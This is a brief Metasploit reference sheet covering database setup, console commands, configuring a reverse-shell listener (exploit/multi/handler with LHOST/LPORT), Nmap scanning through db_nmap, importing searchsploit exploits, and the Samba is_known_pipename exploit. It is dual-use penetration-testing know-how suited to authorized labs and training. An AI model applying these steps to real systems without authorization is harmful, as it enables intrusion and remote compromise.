Metasploit
Setup
Start the postgresql service:
systemctl start postgresql
Enable the postgresql service at boot:
systemctl enable postgresql
Create and initialize the MSF database:
msfdb init
Update Metasploit:
apt update && apt install metasploit-framework
Start Metasploit quietly:
msfconsole -q
Commands
use: activate a module
use exploit/multi/handler
back: go back to the main prompt
previous: activate the previously-used module
show: display module-related info
show options
show payloads
show targets
set/unset: configure options for the currently-used module
set LHOST tun0
set LPORT 443
unset LHOST
unset LPORT
setg/unsetg: configure options for all modules during this Metasploit session
setg LHOST tun0
setg LPORT 443
unsetg LHOST
unsetg LPORT
Database Access
Show stored findings in the current module:
msf6 > services
Check a specific finding on port 445:
msf6 > services -p 445
Run Nmap and save the findings to the database:
msf6 > db_nmap <remote_ip> -A -Pn
Display all discovered hosts:
msf6 > hosts
Add Exploits to Metasploit
If searchsploit
finds a Metasploit exploit but it is not in the Metasploit framework, add it manually:
cp <exploit_path> /usr/share/metasploit-framework/modules/exploits/linux/http
In Metasploit, run reload_all
.
msf6 > reload_all
Advanced Options
Metasploit modules have some advanced options for you to play with. For example, in exploit/linux/samba/is_known_pipename
, we have to set SMB version to 1. This is done in one of the advanced options:

Set SMB:ProtocolVersion
to 1:
msf6 exploit(linux/samba/is_known_pipename) > set SMB::ProtocolVersion 1
Last updated
Was this helpful?